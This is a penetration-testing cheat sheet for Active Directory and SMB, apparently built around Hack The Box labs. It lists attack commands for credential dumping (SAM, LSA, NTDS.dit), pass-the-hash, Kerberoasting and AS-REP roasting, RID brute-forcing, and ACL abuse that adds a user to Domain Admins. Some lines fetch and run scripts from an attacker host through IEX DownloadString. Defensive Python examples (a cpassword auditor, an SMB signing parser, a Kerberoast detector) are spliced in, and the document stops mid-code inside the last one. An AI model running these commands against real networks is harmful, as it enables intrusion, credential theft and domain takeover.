Active Directory / SMB
SMB Enumeration for Windows
Any account whose name ends with a $ sign is either a machine account or a managed service account.
SID structure.
## ------------------| Generate NTLM hashes using password
iconv -f ASCII -t UTF-16LE <(printf "<Password>") | openssl dgst -md4
## On OpenSSL 3.x MD4 lives in the legacy provider: openssl dgst -provider legacy -provider default -md4
objectSid to SID representation
import sys
import base64
import struct

def convert(binary):
    # Byte 0: revision (always 1 today); byte 1: number of sub-authorities
    version = struct.unpack('B', binary[0:1])[0]
    # I do not know how to treat version != 1 (it does not exist yet)
    assert version == 1, version
    length = struct.unpack('B', binary[1:2])[0]
    # Bytes 2-7: 48-bit identifier authority, big-endian
    authority = struct.unpack(b'>Q', b'\x00\x00' + binary[2:8])[0]
    string = 'S-%d-%d' % (version, authority)
    binary = binary[8:]
    assert len(binary) == 4 * length
    # Each sub-authority (the last one is the RID) is a little-endian 32-bit value
    for i in range(length):
        value = struct.unpack('<L', binary[4*i:4*(i+1)])[0]
        string += '-%d' % value
    return string

print(convert(base64.b64decode(sys.argv[1])))
## python3 binary2SID.py <base64==>
Basic commands
## ------------------| Joined/Connect to domain?
##[Windows]
systeminfo | findstr /B "Domain"
### If you see something other than Domain: WORKGROUP, then you are likely joined to a domain
##[Linux]
ls -al /etc/krb5.conf
kinit -k host/$(hostname -f)
## ------------------| Enumerating Domain Admins
net group "Domain Admins" /domain
## ------------------| Enumerating server admins
net group "Server_Admin" /domain
## ------------------| List all users on entire domain
net user /domain
## ------------------| List all groups
net group /domain
## ------------------| List groups for h4rith user
net user h4rith /domain
## ------------------| Current domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
## ------------------| Domain trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
## ------------------| Current forest info
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
## ------------------| Get forest trust relationships
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()
## ------------------| Get DCs of a domain
nltest /dclist:offense.local
net group "domain controllers" /domain
## ------------------| Get DC for currently authenticated session
nltest /dsgetdc:offense.local
## ------------------| Get domain trusts from cmd shell
nltest /domain_trusts
## ------------------| Get user info
nltest /user:"spotless"
## ------------------| List smb shares
Get-SmbShare
Get-SmbShare -Name C$ | select *
## ------------------| Creating a new file share
New-SmbShare -Name <ShareName> -Description "This is description" -Path C:\Shares\<ShareName>
## ------------------| Modifying share properties
Set-SmbShare -Name <ShareName> -Description "This is description" -Force
## ------------------| Granting file share permissions.
Grant-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -AccessRight Full -Force
## You can use Everyone instead of <DOMAIN>\<USER>
## You can use Read, Change or Custom instead of Full.
## ------------------| Removing file share permissions
Revoke-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -Force
## You can use Everyone instead of <DOMAIN>\<USER>
## ------------------| Denying permissions to a file share
Block-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -Force
UnBlock-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -Force
## You can use Everyone instead of <DOMAIN>\<USER>
## ------------------| Removing a file share
Remove-SmbShare -Name <ShareName> -Force
## ------------------| Get DC for currently authenticated session (LOGONSERVER variable)
set l
## ------------------| Get domain name and DC the user authenticated to
klist
## ------------------| Get all logon sessions. Includes NTLM authenticated sessions
klist sessions
## ------------------| Kerberos tickets for the session
klist
## ------------------| Cached TGT
klist tgt
## ------------------| Whoami on older Windows systems
set u
## ------------------| Find DFS shares with ADModule
Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name
## ------------------| Find DFS shares with ADSI
$s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name}
## ------------------| Check if spooler service is running on a host
powershell ls "\\dc01\pipe\spoolss"
Find GPP Passwords in SYSVOL
## ------------------| Manual
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
findstr /S /I cpassword \\<DOMAIN>\sysvol\<DOMAIN>\policies\*.xml
## ------------------| PowerSploit
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1
IEX(New-Object Net.WebClient).DownloadString('http://<IP>/Get-GPPPassword.ps1')
Get-GPPPassword
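The findstr and Get-GPPPassword lines above locate cpassword values one file at a time. As an added example that is not part of the original page or of PowerSploit, the script below is a defender-side audit of a SYSVOL copy: it walks the Group Policy Preference XML files, reports every element that still carries a non-empty cpassword attribute and which account it belongs to, and deliberately stops there, since removing the policy does not require decrypting the value. The Groups.xml content is constructed for the demonstration; the file names and attribute names are the real GPP ones.

```python
"""Audit Group Policy Preference XML files for stored cpassword attributes."""
import os
import xml.etree.ElementTree as ET

# GPP preference files that may carry a cpassword attribute (MS14-025).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}


def find_cpassword(xml_text, source="<string>"):
    """Return (source, element tag, account name, cpassword) for every element
    with a non-empty cpassword. An empty cpassword="" means the password was
    cleared, so nothing is stored there and it is not reported."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cpass = elem.get("cpassword")
        if cpass:
            # Preference items keep the account on the <Properties> element under
            # different attribute names depending on the item type.
            account = (elem.get("userName") or elem.get("accountName")
                       or elem.get("runAs") or "")
            findings.append((source, elem.tag, account, cpass))
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL copy (or a locally mounted share) and collect findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                try:
                    findings.extend(find_cpassword(fh.read(), path))
                except ET.ParseError:
                    continue  # a malformed policy file is skipped, not fatal
    return findings


# Constructed sample modelled on the Groups.xml layout; the cpassword value is
# a made-up string, not real ciphertext.
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="EXAMPLEvalueNOTrealCIPHERTEXT==" userName="LocalAdmin"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Cleared">
    <Properties action="U" cpassword="" userName="Cleared"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for src, tag, account, _cpass in find_cpassword(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{src}: <{tag}> stores a cpassword for account {account!r}")
```

Point scan_sysvol at \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies (mounted or copied) to list every policy that still needs the preference item deleted.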
Local groups (adding a user)
## ------------------| Add to the Remote Desktop Users
net localgroup "Remote Desktop Users" harith /add
## ------------------| Add to the WinRM Users
net localgroup "Remote Management Users" harith /add
## ------------------| Add to the Administrator group
net localgroup "Administrators" harith /add
Find smb version
sudo tcpdump -s0 -n -i tun0 src $IP and port 139 -A -c 10 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.'
sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]' port 139
smbclient -L //$IP
## ------------------| List all
smbclient -N -L //<IP>
## ------------------| For old Samba versions
smbclient -N //<IP>/ --option='client min protocol=NT1'
## ------------------| Download all files
smbclient -N //<IP>/<SHARENAME> -U <USERNAME> -c "prompt OFF;recurse ON;mget *"
## ------------------| Login to the user
smbclient -U '<UserName>%<Password>' \\\\10.10.10.178\\c$
## ------------------| List ACL info about a share path
## If it shows ACL:Everyone:ALLOWED/OI|CI/FULL we can read and write
smbcacls -N //10.10.10.103/Department /Users
## ------------------| Enumerate hosts
nxc smb 192.168.3.201-203
## ------------------| Tricks
## By default nxc authenticates as a domain account rather than a local account,
## so use -d WORKGROUP to try a local user account
## ------------------| Enumerate shares / Basic info
nxc smb 10.10.10.178
nxc smb 10.10.10.161 --shares
nxc smb 10.10.10.161 -u '' -p '' --shares
nxc smb 10.10.10.161 -u 'DoseNotExist' -p '' --shares
nxc smb 10.10.10.161 -u 'DoseNotExist' -H <NThash>
nxc smb 10.10.10.161 -d WORKGROUP -u 'DoseNotExist' -H <NThash>
## ------------------| Enumerate active sessions
nxc smb 10.10.10.161 -u UserName -p 'Password' --sessions
## ------------------| Enumerate disks
nxc smb 10.10.10.161 -u UserName -p 'Password' --disks
## ------------------| Enumerate logged on users
nxc smb 10.10.10.161 -u UserName -p 'Password' --loggedon-users
## ------------------| Enumerate domain users
nxc smb 10.10.10.161 -u UserName -p 'Password' --users
## ------------------| Enumerate users by bruteforcing RID
nxc smb 10.10.10.161 -u UserName -p 'Password' --rid-brute
## ------------------| Enumerate domain groups
nxc smb 10.10.10.161 -u UserName -p 'Password' --groups
## ------------------| Enumerate local groups
nxc smb 10.10.10.161 -u UserName -p 'Password' --local-groups
## ------------------| Identify SMB Signing Disabled
nxc smb --gen-relay-list output.txt 10.10.10.0/24
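The --gen-relay-list check works by reading the SecurityMode field of each server's SMB2 NEGOTIATE response. As an added example that is not part of the original page or of nxc, the parser below does the same offline on raw response bytes (taken from a capture, or here from responses constructed inline for the demonstration), so an auditor can distinguish hosts where signing is required from hosts where it is merely enabled. Offsets follow the SMB2 header and NEGOTIATE response layout; the build_negotiate_response helper exists only to produce test input.

```python
"""Read the SecurityMode flags out of an SMB2 NEGOTIATE response."""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED = 0x0001   # server supports signing
SIGNING_REQUIRED = 0x0002  # server refuses unsigned sessions


def parse_negotiate_response(packet):
    """Return dialect and signing flags from a raw SMB2 NEGOTIATE response
    (64-byte header + body, without the 4-byte NetBIOS length prefix)."""
    if len(packet) < SMB2_HEADER_LEN + 6 or packet[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    command = struct.unpack_from("<H", packet, 12)[0]
    flags = struct.unpack_from("<I", packet, 16)[0]
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    # Body: StructureSize (65), SecurityMode, DialectRevision, ...
    structure_size, security_mode, dialect = struct.unpack_from(
        "<HHH", packet, SMB2_HEADER_LEN)
    if structure_size != 65:
        raise ValueError("unexpected NEGOTIATE response structure size")
    return {
        "dialect": dialect,
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }


def signing_verdict(info):
    """Turn the parsed flags into the state an audit report needs."""
    if info["signing_required"]:
        return "required"
    if info["signing_enabled"]:
        return "enabled but not required"
    return "disabled"


def build_negotiate_response(security_mode, dialect=0x0311):
    """Constructed sample: a minimal well-formed NEGOTIATE response with the
    given SecurityMode (GUID, capabilities and time fields left zero)."""
    header = (SMB2_MAGIC
              # StructureSize, CreditCharge, Status, Command, CreditResponse,
              # Flags, NextCommand, MessageId, Reserved, TreeId, SessionId
              + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, SMB2_NEGOTIATE, 1,
                            SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0)
              + bytes(16))                          # Signature
    body = (struct.pack("<HHHH", 65, security_mode, dialect, 0)  # ..., NegotiateContextCount
            + bytes(16)                                        # ServerGuid
            + struct.pack("<IIII", 0, 65536, 65536, 65536)     # Capabilities, Max* sizes
            + struct.pack("<QQ", 0, 0)                         # SystemTime, ServerStartTime
            + struct.pack("<HHI", 128, 0, 0))                  # SecurityBuffer offset/len, ctx offset
    return header + body


if __name__ == "__main__":
    for mode in (SIGNING_ENABLED | SIGNING_REQUIRED, SIGNING_ENABLED):
        info = parse_negotiate_response(build_negotiate_response(mode))
        print(f"dialect 0x{info['dialect']:04x}: signing {signing_verdict(info)}")
```

Hosts reported as "enabled but not required" are the ones --gen-relay-list writes out; the fix is the RequireSecuritySignature policy on those servers.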
## ------------------| Enumerate password policy
## If Account Lockout Threshold: None, brute forcing will not lock accounts out
nxc smb 10.10.10.161 --pass-pol
nxc smb 10.10.10.161 -u '' -p '' --pass-pol
## ------------------| Dump SAM/LSA/NTDS.dit
nxc smb 10.10.10.161 -u UserName -p 'Password' --sam
nxc smb 10.10.10.161 -u UserName -p 'Password' --lsa
nxc smb 10.10.10.161 -u UserName -p 'Password' --ntds
nxc smb 10.10.10.161 -u UserName -p 'Password' --ntds vss
## ------------------| Execute Commands
## PowerShell
nxc winrm 10.10.10.169 -u melanie -p 'Welcome123!' -X "whoami /all"
## CMD
nxc winrm 10.10.10.169 -u melanie -p 'Welcome123!' -x "whoami /all"
## ------------------| Crawling shares
nxc smb 10.10.10.149 -u 'username' -p 'PassW0rd' -M spider_plus
## ------------------| List shares
smbmap -H 10.10.10.178
smbmap -u 'anonymous' -H 10.10.10.134
smbmap -u 'anonymous' -p 'anonymous' -H 10.10.10.134
## ------------------| Recursively list
smbmap -R directory -H 10.10.10.100
## ------------------| Download file
smbmap -R directory -H 10.10.10.100 -A filename.txt -q
General flags
-H HOST IP of host
--host-file FILE File containing a list of hosts
-u USERNAME Username, if omitted null session assumed
-p PASSWORD Password or NTLM hash
--prompt Prompt for a password
-s SHARE Specify a share (default C$), ex 'C$'
-d DOMAIN Domain name (default WORKGROUP)
-P PORT SMB port (default 445)
-v Return the OS version of the remote host
-x COMMAND Execute a command ex. 'ipconfig /all'
-L List all drives on the specified host (requires ADMIN)
-R [PATH] Recursively list dirs.
-r [PATH] List contents of directory.
-g FILE Output to a file in a grep friendly format
--dir-only List only directories, omit files.
--depth DEPTH Traverse a directory tree to a specific depth.
--download PATH Download a file from the remote system
--upload Upload a file to the remote system ex.
--delete PATH Delete a remote file, ex. 'C$\temp\msf.exe'
--skip Skip delete file confirmation prompt
## ------------------| Login as user
rpcclient -U 'support' <IP>
rpcclient -U 'Administrator:Password' <IP>
## ------------------| Null auth
rpcclient -U '' <IP>
## ------------------| Enumerations
lookupnames Guest
enumdomusers
queryuser 0x450
enumprinters
## ------------------| Change users password
setuserinfo2 <UserAccount> 23 '<Password>'
## ------------------| Brute Forcing User RIDs
for i in $(seq 500 1100);do rpcclient -N -U "" <IP> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
impacket-samrdump <IP>
## ------------------| Normal Usage
evil-winrm -u UserName -p Password -i 10.10.10.149
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
## ------------------| With SSL (port 5986)
evil-winrm -S -i 10.10.10.103 -c amanda.cer -k amanda.key -P 5986
evil-winrm -S -i 10.10.10.103 -c amanda.cer -k amanda.key -u amanda -P 5986
## If you get a message like "The term 'Invoke-Expression' is not recognized as the name of a cmdlet",
## the remote computer is in Constrained Language Mode. Try this instead:
sudo apt-get install gss-ntlmssp
pwsh
$pass = ConvertTo-SecureString '<PassWord>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<ACCOUNT_NAME>', $pass)
Enter-PSSession -ComputerName <IP> -Credential $cred -Authentication Negotiate
## ------------------| Enable remote access to ADMIN$, C$, IPC$ (Windows administrative shares) for local accounts
REG add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
## ------------------| If we have R&W on SMB shares
impacket-psexec HTB/James:'J@m3s_P@ssW0rd!'@10.10.10.52
## ------------------| If you have the NTLM hash [Pass the Hash]
impacket-psexec <Domain>/<User>@<IP> -hashes <LMHASH>:<NTHASH>
If you are in an AD environment
## ------------------| Import ad module
Get-Module -Name ActiveDirectory -ListAvailable
Import-Module -Name ActiveDirectory
## ------------------| List all users + computer
Get-ADObject -LDAPFilter "(objectClass=user)"
Get-ADObject -LDAPFilter "(objectCategory=user)"
Get-ADObject -LDAPFilter "(&(!(objectClass=computer))(objectCategory=user))"
## ------------------| List all users whose account name starts with j
Get-ADObject -LDAPFilter "(sAMAccountName=j*)"
Get-ADObject -LDAPFilter "(sAMAccountName=j*)" -Properties cn,objectSid,description,givenname,sn
## ------------------| List all users which have an SPN (Service Principal Name) set (GetUserSPNs)
Get-ADObject -LDAPFilter "(servicePrincipalName=*)"
Get-ADObject -LDAPFilter "(servicePrincipalName=*)" -Properties servicePrincipalName
Microsoft ActiveDirectory PowerShell ADModule
## ------------------| Setup
wget https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1
wget https://github.com/samratashok/ADModule/raw/master/Microsoft.ActiveDirectory.Management.dll
## First you need to import the dll file [Use Absolute Path or .\Microsoft.ActiveDirectory.Management.dll]
Import-Module C:\Full\Path\Microsoft.ActiveDirectory.Management.dll -Verbose
# or : Import-ActiveDirectory -ActiveDirectoryModule C:\Full\Path\Microsoft.ActiveDirectory.Management.dll
. .\Import-ActiveDirectory.ps1
Get-Command -Module ActiveDirectory
## ------------------| Basic Domain Enum
Get-ADDomain # List current domain
Get-ADDomain -Identity <DomainName> # List other domain info
(Get-ADDomain).DomainSID # List domain SID value
Get-ADDomainController # List domain controllers
Get-ADDomainController -DomainName <Domain> -Discover
## ------------------| User Enumeration
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity <UserName> -Properties *
Get-ADUser -Filter * -Properties * | select Name
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Properties | select Name
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description
## ------------------| Computer Enumeration
Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter 'OperatingSystem -like "*Windows*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer "<ComputerName>" -Properties * | Format-Table OperatingSystem,OperatingSystemVersion,OperatingSystemServicePack
## ------------------| Domain Group Enumeration
Get-ADGroup -Filter * | select name
Get-ADGroup -Filter * -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"' | select name
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADPrincipalGroupMembership -Identity <UserName>
## ------------------| Enumerate Organizational units [OUs]
Get-ADOrganizationalUnit -Filter * -Properties * | select name
## ------------------| Enumerate ACL
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=<Domain>').Access
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=<Domain>').Access | select IdentityReference,ActiveDirectoryRights | fl
## ------------------| Enumerate Domain Trusts
Get-ADTrust -Filter *
Get-ADTrust -Identity <FQDN>
## ------------------| Enumerate Domain Forests
Get-ADForest
(Get-ADForest).Domains
Get-ADForest -Identity <FQDN>
Get-ADForest | select -ExpandProperty GlobalCatalogs
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
Common
## ------------------| Load the script remotely & locally
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/PowerView.ps1')
Import-Module .\PowerView.ps1
. .\PowerView.ps1
## ------------------| Enumerate Current Domain
Get-Domain
Get-Domain -Domain <DomainName>
Get-DomainSID
## ------------------| Enumerate Domain Controllers
Get-DomainController
Get-DomainController -Domain <DomainName>
## ------------------| Enumerate Domain Computers
Get-NetComputer
Get-NetComputer | select name
Get-NetComputer | select Name,operatingsystem
Get-NetComputer -OperatingSystem "*Server 2016*" | select name,operatingsystem
## ------------------| Enumerate Domain Users
Get-DomainUser
Get-DomainUser -Identity <username>
Get-DomainUser | select cn
Get-DomainUser | select samaccountname,logoncount,lastlogon
Get-DomainUser -Identity <username> -Properties DisplayName, MemberOf,objectsid,useraccountcontrol | Format-List
## ------------------| Enumerate All Groups
Get-NetGroup
Get-NetGroup | select name
Get-NetGroup 'Domain Admins'
Get-NetGroup "*admin*"| select name
Get-NetGroup -Domain <targetdomain> | select name
Get-NetGroupMember "Domain Admins" -Recurse | select MemberName
## ------------------| Enumerate Local Groups
Get-NetLocalGroup
Get-NetLocalGroup | Select-Object GroupName
Get-NetLocalGroup -ComputerName <computername>
Get-NetGroup -UserName "<username>" | select name
Get-NetGroupMember -MemberName "domain admins" -Recurse | select MemberName
Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
## ------------------| Enumerate Domain Policy
Get-DomainPolicy
(Get-DomainPolicy)."SystemAccess"
(Get-DomainPolicy)."kerberospolicy"
(Get-DomainPolicy -domain <DomainName>)."SystemAccess"
## ------------------| Enumerate Group Policy [GPO]
Get-NetGPO
Get-NetGPO | select displayname
Get-NetGPO -ComputerName <ComputeName>
Find-GPOComputerAdmin -ComputerName <ComputeName>
Find-GPOLocation -UserName <UserName> -Verbose
## ------------------| Enumerate Organizational Units [OUs]
Get-NetOU
Get-NetOU | select distinguishedname
## ------------------| Enumerate ACL
Invoke-ACLScanner -ResolveGUIDs # Time-consuming
Get-ObjectAcl -Identity <UserName> -ResolveGUIDs
Get-ObjectAcl -SamAccountName <UserName> -ResolveGUIDs
Get-ObjectAcl -SamAccountName <UserName> -ResolveGUIDs | select ObjectDN,ActiveDirectoryRights | fl
## ------------------| Enumerate Domain Trusts
Get-DomainTrust
Get-DomainTrust -Domain <FQDN>
## ------------------| Enumerate Domain Forests
Get-Forest
Get-ForestTrust
Get-ForestDomain
Get-ForestGlobalCatalog
Get-Forest -Forest <Domain>
Get-ForestTrust -Forest <Domain>
Get-ForestDomain -Forest <Domain>
Get-ForestGlobalCatalog -Forest <Domain>
## ------------------| List Domain or File Shares.
Find-DomainShare
Get-NetFileServer -Verbose
Invoke-ShareFinder -Verbose
Find-DomainShare -CheckShareAccess
## ------------------| Find sensitive files on computer in the domain
Invoke-FileFinder -Verbose
## ------------------| Request TGS
Request-SPNTicket
## ------------------| Convert SID value to Name
"<SID>" | Convert-SidToName
## ------------------| Kerberoast
Invoke-Kerberoast
Invoke-Kerberoast -Identity <UserName>
## ------------------| Impersonate a user
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<Domain>\<User>', $pass)
Invoke-UserImpersonation -Credential $cred
Invoke-RevertToSelf
## ------------------| Special Enumerations
## Find all machines on the domain where current account has local admin access
Find-LocalAdminAccess -Verbose ## Very Noisy
Invoke-EnumerateLocalAdmin -Verbose ## Need Admin Prv
## List all logged-on / active users
Get-NetLoggedon
Get-NetLoggedon -ComputerName <TargetMachineName> | Format-Table -AutoSize
Get-NetSession -ComputerName <DCName> | Format-Table -AutoSize
## List all Service Accounts [SPNs]
Get-NetUser -SPN
Get-NetUser | Where-Object {$_.servicePrincipalName} | select samaccountname,serviceprincipalname | fl
## List all Accounts with Kerberos pre-auth disabled [AS-REP Roasting]
Get-DomainUser -PreauthNotRequired -Verbose
## Find all computers which has sessions
Invoke-UserHunter
Invoke-UserHunter -Stealth ## Only target high value machines
Invoke-UserHunter -CheckAccess
Invoke-UserHunter -GroupName "Domain Admins"
Abusing WriteOwner
## ------------------| Change owner
Set-DomainObjectOwner -Identity <User1> -OwnerIdentity <User2>
## ------------------| Change Rights to reset password
Add-DomainObjectAcl -TargetIdentity Herman -PrincipalIdentity nico -Rights ResetPassword -Verbose
## Password change is listed under the PowerShell commands
## ------------------| Change the ownership of a group
## The credential isn't necessary, but...
$pass = ConvertTo-SecureString 'W3llcr4ft3d_4cls' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('object.local\maria', $pass)
## Change the ownership of "Domain Admins" group
Set-DomainObjectOwner -Credential $cred -Identity "Domain Admins" -OwnerIdentity maria
## Give all rights to maria
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
## maria can now add herself to the group
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
## or net group "Domain Admins" maria /add /domain
net user maria
Abusing ForceChangePassword
## ------------------| Reset password
$pass = ConvertTo-SecureString 'Password123!' -asPlainText -Force
Set-DomainUserPassword <UserName> -AccountPassword $pass -Verbose
## ------------------| Simple Powershell if you are on AD
Set-ADAccountPassword -Identity <UserName> -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force)
Abusing GenericAll
## ------------------| Add member to another group
$pass = ConvertTo-SecureString 'Password123!' -asPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\Herman',$pass)
Add-DomainGroupMember -Identity 'Backup_Admins' -Members Herman -Credential $cred
Get-DomainGroup -MemberIdentity Herman | select samaccountname
Abusing GenericWrite
## ------------------| Setup
## The credential isn't necessary, but...
$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<Domain>\<UserName>', $pass)
## ------------------| Method I
## Set a service principal name and kerberoast that account.
## To actually Kerberoast, we need an SPN with a valid format like MSSQLSvc/<Domain>:1433
Set-DomainObject -Identity <UserNameToSetSPN> -SET @{serviceprincipalname='MSSQLSvc/<Domain>:1433'}
## We can also use the built-in binary: setspn -a MSSQLSvc/<Domain>:1433 <Domain>\<UserName>
## With creds : Set-DomainObject -Credential $cred -Identity <UserNameToSetSPN> -SET @{serviceprincipalname='MSSQLSvc/<Domain>:1433'}
Get-DomainUser <UserNameToSetSPN> | Select serviceprincipalname
Get-DomainSPNTicket -SPN "MSSQLSvc/<Domain>:1433" -Credential $cred | fl
.\Rubeus.exe kerberoast /creduser:<Domain>\<UserName> /credpassword:Password123!
## ------------------| Method II
## Setting the logon script
cd C:\Windows\temp\
echo 'whoami > C:\\Windows\\temp\\poc.txt' > foo.ps1
Set-DomainObject -Credential $cred -Identity <UserName> -SET @{scriptpath='C:\\Windows\\temp\\\\foo.ps1'}
Abusing AddKeyCredentialLink
## ------------------| Setup
wget https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_Any/Whisker.exe
.\Whisker.exe add /target:<UserName>
## Then run Rubeus command and get the NTLM hash
evil-winrm -i <IP> -u <UserName> -H <Hash>
impacket-GetADUsers -all -dc-ip <IP> <domain>/<user>
impacket-GetADUsers -all -dc-ip <IP> <domain>/<user> -hashes <LM:NT>
## ------------------| Without password
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user> -no-pass
## ------------------| With password
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user>:<password>
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user> -hashes <LM:NT>
## ------------------| Use Kerberos authentication. Grabs credentials from ccache file
impacket-GetUserSPNs -request -k -no-pass -dc-host dc1.scrm.local scrm.local/ksimpson
## ------------------| Check Kerberos pre-authentication disabled?
impacket-GetNPUsers -dc-ip <IP> <domain>/<user> -no-pass
impacket-GetNPUsers -dc-ip <IP> -no-pass -usersfile /usr/share/seclists/Usernames/Names/names.txt <domain>/
## ------------------| Common
impacket-GetNPUsers -dc-ip <IP> -request '<domain>/'
impacket-GetNPUsers -dc-ip <IP> -request <domain>/<username>:<password>
impacket-GetNPUsers -dc-ip <IP> -request <domain>/<username> -hashes <LM:NT>
## ------------------| Get hashcat format
impacket-GetNPUsers -format hashcat -dc-ip <IP> -request '<domain>/'
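Both request types above leave a trace on the domain controller: GetUserSPNs produces 4769 (TGS request) events for RC4-encrypted service tickets, and GetNPUsers produces 4768 (TGT request) events whose PreAuthType is 0. As an added example that is not part of the original page or of Impacket, the detector below reads such events as JSON lines (the sample lines are constructed for the demonstration; field names are the ones Windows uses in these events) and reports RC4 service tickets for user-style accounts, bursts of them from one requester, and RC4 TGTs issued without pre-authentication. The burst threshold of 3 is an assumed tuning value.

```python
"""Flag Kerberoast- and AS-REP-roast-shaped requests in DC security events."""
import json
from collections import defaultdict

RC4_HMAC = 0x17      # etype 23; AES tickets are 0x11 / 0x12
PREAUTH_NONE = "0"   # 4768 PreAuthType 0: logon without pre-authentication


def classify(event):
    """Return a tag for one parsed event, or None when it is uninteresting."""
    etype = int(event.get("TicketEncryptionType", "0x0"), 16)
    if event["EventID"] == 4769:
        service = event.get("ServiceName", "")
        # Machine accounts and krbtgt are excluded: an RC4 ticket for a
        # user-style service account is the roasting signal.
        if (etype == RC4_HMAC and event.get("Status") == "0x0"
                and not service.endswith("$") and service.lower() != "krbtgt"):
            return "rc4-service-ticket"
    elif event["EventID"] == 4768:
        if (event.get("PreAuthType") == PREAUTH_NONE and etype == RC4_HMAC
                and event.get("Status") == "0x0"):
            return "asrep-without-preauth"
    return None


def detect(lines, burst_threshold=3):
    """Run the classifier over JSON event lines and aggregate alerts.
    Returns a list of tuples; a single AS-REP hit is already an alert, while
    RC4 TGS requests only alert once one requester asks for several services."""
    alerts = []
    tgs_by_requester = defaultdict(set)
    for line in lines:
        event = json.loads(line)
        tag = classify(event)
        if tag == "rc4-service-ticket":
            tgs_by_requester[event["TargetUserName"]].add(event["ServiceName"])
        elif tag == "asrep-without-preauth":
            alerts.append(("asrep-roastable-account-used",
                           event["TargetUserName"], event.get("IpAddress", "")))
    for requester, services in tgs_by_requester.items():
        if len(services) >= burst_threshold:
            alerts.append(("possible-kerberoast", requester, sorted(services)))
    return alerts


def _event(**fields):
    return json.dumps(fields)


# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    _event(EventID=4769, TargetUserName="alice@CORP.LOCAL", ServiceName="sqlsvc",
           TicketEncryptionType="0x17", Status="0x0", IpAddress="::ffff:10.0.0.25"),
    _event(EventID=4769, TargetUserName="alice@CORP.LOCAL", ServiceName="websvc",
           TicketEncryptionType="0x17", Status="0x0", IpAddress="::ffff:10.0.0.25"),
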